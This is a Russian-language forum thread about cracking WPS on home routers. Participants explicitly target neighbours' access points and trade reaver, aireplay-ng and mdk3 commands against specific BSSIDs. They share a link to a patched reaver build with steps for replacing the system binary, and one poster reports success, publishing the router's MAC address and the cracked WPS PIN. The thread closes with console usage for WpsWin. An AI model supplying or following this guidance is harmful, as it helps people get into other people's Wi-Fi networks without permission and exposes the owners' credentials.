Уязвимость в протоколе Wi-Fi Protected Setup

http://rghost.ru/858wgVqrm

 

Да, по этим словарям уже прогнал, не то. Видимо, это какая-то обновленная версия прошивки. Неделю назад соседям установили такой же роутер. Сигнал еще лучше, чем у первой жертвы. Однако, WPS тоже не брутится. Судя по всему, алгоритм в роутере вычисляет попытку брута и включает некую защиту: в какой-то момент типа принимает первую часть пина, ну а вторую часть бесконечно динамит. Кто-нибудь знает, как обойти эту защиту?

 

48:5B:39:42:B2:39 WL520gu ASUS как к нему лучше подбирать wps pin поделитесь опытом и возможно ли это вообще?

 

EC:43:F6:03:d7:68 Zyxel Keenetic Giga
на команду: reaver -i wlan0 -c 1 -b EC:43:F6:037:68 -vv -S
отвечает: WARNING: Failed to associate with EC:43:F6:037:68 (ESSID: Leonidus_NetX)
Как быть?

 

wlan0 ?

Адаптер в режим мониторинга хоть перевели? Это ведь mon0, либо wlan0mon.

 

Прошу прощения сразу не написал
Kali Linux 2.0

Перевожу в режим монитора командами
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up

airodump-ng и mdk3 работают как положено.

 

Попробуй ввести aireplay-ng -1 0 -a EC:43:F6:037:68 wlan0
Если выводит Denied (code 12), wrong ESSID or WPA? значит WPS не работает.
Если ничего не происходит (зацикливается) то что-то с сигналом.
Если зацикливается, но в конце каждой строчки написано [ACK], значит возможно у ТД есть фильтрация по MAC

 

В Kali 2.0 режим монитора создается с виртуальным устройством wlan0mon. Скорее всего Вам нужно именно его указать после ключа -i.

 

На команду aireplay-ng -1 0 -a EC:43:F6:037:68 wlan0
ответил
No source MAC (-h) specified. Using the device MAC (00:22:88:02:18:F0)
16:39:27 Waiting for beacon frame (BSSID: EC:43:F6:037:68) on channel 1

16:39:27 Sending Authentication Request (Open System) [ACK]
16:39:27 Authentication successful
16:39:27 Sending Association Request [ACK]
16:39:27 Association successful (AID: 1)

P.S. Hе подскажите-ли где в linux хранятся команды, которые набирались в терминале?

 

Обычно в домашней директории пользователя.Например /home/kolya Называется этот файл обычно .bash_history.
Но файл скрытый.Чтоб посмотреть скрытые файлы зажми Ctrl+h

 

Попробуйте этот reaver, и если попробуете - просьба отписать здесь.
http://rghost.ru/645WgR4CY
Если что-то не получается, запишите cap файл, с интерфейса, тогда можно точно будет сказать, в чём там проблема.
У reaver есть особенность - не любит когда точка передает несколько одинаковых пакетов, возможно - ваш случай. По ссылке - исправленная версия.
Upd: запускать так: ./reaver , если без ./ - будет запущен тот, что установлен в системе.

 

Спасибо, нашёл

 

Честно сказать я в linux совсем нуб. Куда необходимо скопировать, или как-то инсталлировать новый reaver, что-бы он работал. (из папки Загрузки не запускается)

 

chmod +x reaver
-это дать права на выполнение. Но лучше сначала скопировать в домашнюю папку, т.к. неизвестно - можно ли из вашей "папки Загрузки" что-либо запускать.

 

Попробуй запихать reaver в другую папку.Создай например папку reaver.Затем в терминале заходиш в неё так:
cd '/home/kolya/reaver' --> enter
ну и запускаешь reaver:
./reaver -i wlan2mon -b AA:A6:68:6D:8A:87
Возможно от sudo запускать надо.
./sudo reaver -i wlan2mon -b AA:A6:68:6D:8A:87

 

Да, у меня kali 32 бит. Если у вас 64 - не запустится, надо было сразу предупредить.

 

Kali у меня тоже 32 bit. Ваш reaver запустился, начался перебор, после двух PIN точка залочилась. Я хотел попробовать PiexeDust, но похоже в Вашем его нет, или я ошибаюсь?

 

PiexeDust - не нужно трогать в вашем случае. С Zyxel-ями reaver нужно запускать с опцией "-K 1", но сначала - заменить старый бинарник на новый.
whereis reaver
- покажет, где старый. Если не заменить, то после того, как отработает PiexeDust, запустится старый бинарник. Ну, как разлочится, попробуете. Главное - что работает.
upd: "начался перебор" - на zyxel и не будет никакого перебора - лочатся вмиг

 

Заменил в папке /usr/bin/reaver. Старый был размером около 370 кБ, новый около 700 кБ. Теперь ждём-с. Попробую mdk3, правда сам zyxel на атаку не реагирует, посмотрим насколько терпения хватит у хозяина
P.S. Выражаю большую благодарность всем откликнувшимся, и особенно VasiliyP за оказанную помощь. Точка сдалась. Для статистики MAC - EC:43:F6:03:d7:68 WPS PIN - 84249036
P.P.S. Что-ж в оригинальном дистрибутиве Kali 2.0 такой неправильный reaver.

 

Немного покопался в опкодах утилиты WpsWin (идёт в поставке с Dumpper). В процессе исследования выяснилось, что ей можно пользоваться через консоль таким образом:

Code:

WpsWin Action=Registrar ESSID=WIFIAP PIN=12345670

Плюсы:
1. Работает из консоли
2. Выводит полученный пароль
3. Не требует драйвера-фильтра JumpStart Wireless

Минусы:
1. Не умеет выводить список сетей с включённым WPS
2. Не умеет ассоциироваться по конкретному BSSID (впрочем, с JSW также)
3. Выводит сообщения на испанском

Плюсов и минусов поровну, но положительные качества более весомые.

Особенности внутренней работы утилиты:
- Использует COM для работы с WPS - Provider\Microsoft.Networking.WCN
- Использует WLANAPI для добавления профиля сети в систему - WlanSetProfile